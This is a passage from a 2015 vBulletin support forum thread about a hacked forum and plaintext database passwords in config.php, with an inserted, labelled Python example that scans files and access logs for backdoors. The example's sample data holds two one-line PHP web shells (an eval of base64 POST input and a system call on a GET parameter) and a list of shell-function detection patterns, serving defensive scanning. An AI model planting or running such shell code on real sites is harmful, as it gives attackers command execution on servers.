That is another question: why is it then in /includes, why not in /install and removed before the site is powered up?

Because every action on the site, whether it's to log in, view a page, create a thread, or make a post, requires db access, which requires the credentials (username, password), so the credentials need to be accessible.

X-or
09-10-2015, 06:12 PM
Not really, you missed the point that if the file is not accessible, the password within the file does not need to be encrypted because no one can access it to see it. You only need to encrypt things if you don't want others who are looking at it to be able to see what it is. Since no one can look at it, in a properly configured setup, why would it be encrypted, as all that does is add unneeded overhead to every single page view?

I guess you don't know much about security.

Why do you think htaccess encrypts passwords? Just for teh phun?

Not using encrypted passwords means that if the FTP is compromised then the database is automatically compromised as well; it wouldn't be the case with an encrypted password. Think before you type something really stupid.

The only reason I can see for vBulletin to not use encrypted passwords is for customer convenience, but convenience is often the worst enemy of security.

alcazarx
09-10-2015, 06:38 PM
Do you know about security?

htaccess doesn't encrypt passwords; it's just a file with some rules in it.
It can use them using htpasswd.

Not using encrypted passwords means that if the FTP is compromised then the database is automatically compromised as well; it wouldn't be the case with an encrypted password. Think before you type something really stupid.
If you read some posts before, you should know that if a hacker has access to your webspace / shell / hosting panel etc., plain text files are your least problem.
Even if you encrypted the content, it would have to be decrypted to make use of it. So can the hacker, since he can find the algorithm used in the files.

And as said here, most, if not all scripts (Forum, Chat, CMS, Blog etc.) that use a database store their config data in plain text in files, so it's not a "vB only" problem.

X-or
09-10-2015, 07:53 PM
:facepalm:

Dave
09-10-2015, 08:02 PM
Okay, so let's just sum up the ways this could have happened:
- Someone got root access on the shared server and decided to mess up a bunch of sites.
- Someone found a malicious vBulletin plugin (or a backdoored plugin) and abused this to gain access to execute commands.
- OP had his FTP/cPanel information stolen somehow. (Which is not likely unless OP has a virus/malware.)

Also, even if they had access to the database information, they can't do anything with it unless the host has a publicly listening MySQL server, a publicly reachable phpMyAdmin installation, or they had access to create PHP files.

Were the access logs checked by the way?

Regardless, my advice is to move host asap.
Once you lose trust in your host, you should save yourself the trouble and move.
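The two checks raised above, cellarius's point that the restored tree was never properly scanned for hidden backdoors and Dave's question whether the access logs were checked, as an added example that is not vBulletin's code and was not posted by anyone in the thread. The file tree, the clean-install manifest and the log lines are all constructed for the example, and the file names in it are hypothetical; the indicator patterns are heuristics that legitimate code can also match, so treat hits as leads to read by hand. It covers files and the web log only; it does not look inside the database, which cellarius also lists as a place a backdoor can hide.

```python
"""Added example, not vBulletin's code and not posted by anyone in the thread.

Two checks for a restored forum tree: (1) flag PHP files that are not in a
clean-install manifest or that contain common web-shell indicators, and
(2) pull the access-log lines that show those files being hit, plus any
direct request for includes/config.php. All paths, file contents and log
lines below are constructed for the example.
"""
import os
import re

# Constructed stand-in for the restored tree: path -> file contents.
SAMPLE_TREE = {
    "forums/includes/config.php":
        "<?php\n$config['MasterServer']['password'] = 'example-only';\n",
    "forums/includes/functions.php":
        "<?php\nfunction fetch_something() { return 1; }\n",
    # Planted file: eval of base64 taken from POST is a classic dropper shell.
    "forums/includes/class_x.php":
        "<?php\n@eval(base64_decode($_POST['c']));\n",
    # Planted file hidden as a dotfile in an upload directory.
    "forums/images/misc/.cache.php":
        "<?php\nif (isset($_GET['cmd'])) { system($_GET['cmd']); }\n",
}

# Constructed stand-in for a manifest built from a clean copy of the same version.
KNOWN_GOOD = {
    "forums/includes/config.php",
    "forums/includes/functions.php",
}

# Heuristic indicators; legitimate code can match, so treat hits as leads, not proof.
BACKDOOR_PATTERNS = [
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"\bbase64_decode\s*\(", re.I),
    re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
    re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I),
    re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\(", re.I),  # $_GET['f']() style call
]


def load_tree(root):
    """Read every .php file under root into the same {path: contents} shape as SAMPLE_TREE."""
    root = root.rstrip(os.sep)
    base = os.path.dirname(root) or "."
    tree = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    tree[os.path.relpath(full, base)] = fh.read()
    return tree


def find_suspicious_php(tree, known_good):
    """Return {path: [reasons]} for .php files outside the manifest or matching indicators."""
    findings = {}
    for path, content in sorted(tree.items()):
        if not path.lower().endswith(".php"):
            continue
        reasons = []
        if path not in known_good:
            reasons.append("not in clean-install manifest")
        reasons += ["matches " + p.pattern for p in BACKDOOR_PATTERNS if p.search(content)]
        if reasons:
            findings[path] = reasons
    return findings


# Apache combined log format; constructed lines use documentation-range IPs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

SAMPLE_LOG = [
    '203.0.113.7 - - [08/Sep/2015:03:12:44 +0000] "GET /forums/forumdisplay.php?f=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Sep/2015:03:13:01 +0000] "POST /forums/includes/class_x.php HTTP/1.1" 200 45',
    '198.51.100.9 - - [08/Sep/2015:03:14:10 +0000] "GET /forums/includes/config.php HTTP/1.1" 403 210',
    '198.51.100.9 - - [08/Sep/2015:03:15:03 +0000] "GET /forums/images/misc/.cache.php?cmd=id HTTP/1.1" 200 60',
]


def suspicious_log_hits(lines, flagged_paths, config_path="forums/includes/config.php"):
    """Return a list of dicts for requests that (a) got a 2xx from a flagged file,
    or (b) asked for config.php directly, whatever the status: a 403 there means
    the deny rule held but someone was probing for it."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, or a truncated line
        path = m.group("url").split("?", 1)[0].lstrip("/")
        status = int(m.group("status"))
        if path in flagged_paths and 200 <= status < 300:
            reason = "served request to flagged file"
        elif path == config_path:
            reason = "direct request for config.php"
        else:
            continue
        hits.append({"ip": m.group("ip"), "when": m.group("ts"), "method": m.group("method"),
                     "path": path, "status": status, "reason": reason})
    return hits


if __name__ == "__main__":
    flagged = find_suspicious_php(SAMPLE_TREE, KNOWN_GOOD)
    for path, reasons in flagged.items():
        print(path, "->", "; ".join(reasons))
    for h in suspicious_log_hits(SAMPLE_LOG, set(flagged)):
        print(h["ip"], h["when"], h["method"], h["path"], h["status"], "->", h["reason"])
```

Against a real restore, replace SAMPLE_TREE with load_tree("/path/to/public_html/forums"), build KNOWN_GOOD from the file list of a clean copy of the same vBulletin version, and feed the host's access log lines to suspicious_log_hits; the first served POST to an unknown PHP file is usually the earliest point worth pulling the full log history for.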

TheLastSuperman
09-10-2015, 08:55 PM
^ I've reviewed his reviews on exploits and other via his blog, so heed his advice; Dave actually knows his stuff. The rest of you, geesh, argue your rears off within reason :p.

ozzy47
09-10-2015, 09:00 PM
That would be a good call, Dave does know his security stuff. :)

loua_oz
09-20-2015, 11:46 AM
I don't really care about your advice, although I appreciate your time to chip in.

It came before: the product, vBulletin, has to be a product serviceable by a user. Not by the boffins.

That is why I bought it. But it appears not to be the case.

The trivialities recommended here are laughable, all the advice. Furthermore, so-called "Experts" advocating open text passwords, is it not a degeneration of humanity?

Anyone off the street could tell you an open text password is a stupidity; still, here, VB coders and developers are scolding me for saying just that.

BTW, my humble site is working well, after I have reinstalled it and not listened to anything said in this thread.

Until someone is pleased to hack it.

ozzy47
09-20-2015, 12:24 PM
If you don't want people's advice, then why post? You seem to know it all, so no need to waste people's time replying to you when you tell them you don't care about the advice given.

RichieBoy67
09-20-2015, 12:24 PM
I guess you know better than all of us who have been using it for years. Good luck.

loua_oz
09-20-2015, 01:02 PM
I guess you know better than all of us who have been using it for years. Good luck.

Not really.
But I bought a product that falls victim to anyone who wants to hack it.
Just when they want.

Then I need someone (outside of vB) to help me. That is not a product, that is rubbish.

Still talking VB4. Not VB 5.

ozzy47
09-20-2015, 01:03 PM
If that was the case, every vB site in the web would be hacked, not just yours.

loua_oz
09-20-2015, 01:18 PM
And they are, the world over, every day.

Those who don't know what to say, retreat to Database injections.

Really, how could that happen? It might, but the database is not vB's property, nor mine; it is on my site provider.
Is it a mystery that covers up blatant security holes within vB? Like the plain database password, open for all, so much loved by vB coders and developers?

What they might not know is that entering the SQL code of the provider's database would affect not only one site. That could have happened to me and I don't know about others.
Hence your advice (if you have guts, go back and read it) was useless.

RichieBoy67
09-20-2015, 01:26 PM
Wow,

If you installed correctly and updated when exploits were found, you would never have had an issue. Even Windows gets updated because exploits are found every so often.

It is a website and it is complex. There is always a learning curve, but if you do not want to learn from those who know it well, then good luck finding your magic script that doesn't exist.

My site has been up since 2004 and has never had a successful "injection" attack. I have clients that have sites that go back further and have never been hacked.

At any rate, the people here have taken the time to try to share knowledge with you. Perhaps a thank you would have been a better reply, and yes, your site may be running, but if you did not fix the issue then I am sure it will be hacked again. All it takes with any website is one wrong move, like a file permission, and it is all over.

ozzy47
09-20-2015, 01:28 PM
Don't waste your time on the unhelpable.

loua_oz
09-20-2015, 02:20 PM
Amazing how amateurish and trivial the advice here was. About poor quality software that sits atop something that is a science for them, somebody else's database.
Then they started exploring the mysteries beyond their reach, told (vB staff did that) the customer he has a bugger in his nose, ridiculed him and did nothing.

Other than welcoming even less introduced boiler-room vultures.

Instead, a good product would have never needed them nor any discussion. Not even this site.
It would, simply, work.

ozzy47
09-20-2015, 03:07 PM
Wow, just wow. SMH.

Lynne
09-20-2015, 07:58 PM
Since the OP is no longer looking for advice, now is probably a good time to just close this thread.

Paul M
09-20-2015, 09:00 PM
Amazing how amateurish and trivial advice were here.
The only amazing thing here is your attitude. :rolleyes:

Since you clearly know far better than everyone else, feel free never to ask for any advice here again.

I would close this, but it seems Lynne beat me to it.